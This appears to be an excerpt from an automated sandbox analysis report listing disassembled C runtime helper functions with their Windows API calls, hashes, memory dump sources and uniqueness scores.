                                                                                                                                                                      • String ID: GetUserDefaultLocaleName
                                                                                                                                                                      • API String ID: 3217810228-151340334
                                                                                                                                                                      • Opcode ID: f36847d21b47396b6124b8caf12b7d888d3aeb93c0b5cdd0a56f9e98f48143d9
                                                                                                                                                                      • Instruction ID: 41786cb2400099b544efce5ff115e16f59c3f262968c48fb5bb5bbc01fe0a5a3
                                                                                                                                                                      • Opcode Fuzzy Hash: f36847d21b47396b6124b8caf12b7d888d3aeb93c0b5cdd0a56f9e98f48143d9
                                                                                                                                                                      • Instruction Fuzzy Hash: A4F0BE10B0814281EB94EBD9A6813B9EB51BF88780FC54037E90D27B95DE3CA8558322
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7F014, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7F045
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00007FF7E3D7496C,?,?,?,?,?,?,?,?,00007FF7E3D72177), ref: 00007FF7E3D7F05F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                                                                      • API String ID: 539475747-3084827643
                                                                                                                                                                      • Opcode ID: 2cbb35288a37513c5ba61f5b238e96a2c6ce937cdb013f21624f9d819ca3875d
                                                                                                                                                                      • Instruction ID: 88b8d64396c3d94d292e29b00693c8e15fc3fb2aba2b3726607e8aa57be15056
                                                                                                                                                                      • Opcode Fuzzy Hash: 2cbb35288a37513c5ba61f5b238e96a2c6ce937cdb013f21624f9d819ca3875d
                                                                                                                                                                      • Instruction Fuzzy Hash: 9FF09A21A0868181E794EB85F4402A8AA65FF88B80F844037EA1D37B55CE7CE8998762
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7E3D7EED8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF7E3D7EF01
                                                                                                                                                                      • TlsSetValue.KERNEL32(?,?,8000000000000000,00007FF7E3D7AC42,?,?,8000000000000000,00007FF7E3D76A2D,?,?,?,?,00007FF7E3D7AE29), ref: 00007FF7E3D7EF18
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001D.00000002.308939534.00007FF7E3D61000.00000020.00020000.sdmp, Offset: 00007FF7E3D60000, based on PE: true
                                                                                                                                                                      • Associated: 0000001D.00000002.308913355.00007FF7E3D60000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308977481.00007FF7E3D8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.308993974.00007FF7E3DA0000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000001D.00000002.309032842.00007FF7E3DA4000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                                                                      • String ID: FlsSetValue
                                                                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                                                                      • Opcode ID: 62cd9636d67e5ce5c82c1edbb01e06b21be09cd90d2af876ab34d084c39e020e
                                                                                                                                                                      • Instruction ID: e5594786be50fbafdf58fa0723507fc8c00d78f5de6e65ff9a6caf2a22428701
                                                                                                                                                                      • Opcode Fuzzy Hash: 62cd9636d67e5ce5c82c1edbb01e06b21be09cd90d2af876ab34d084c39e020e
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CE03061A0854691FA84EB94F4442B8EA25AF88781FC84033D50D6A295CE3CE855C322
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%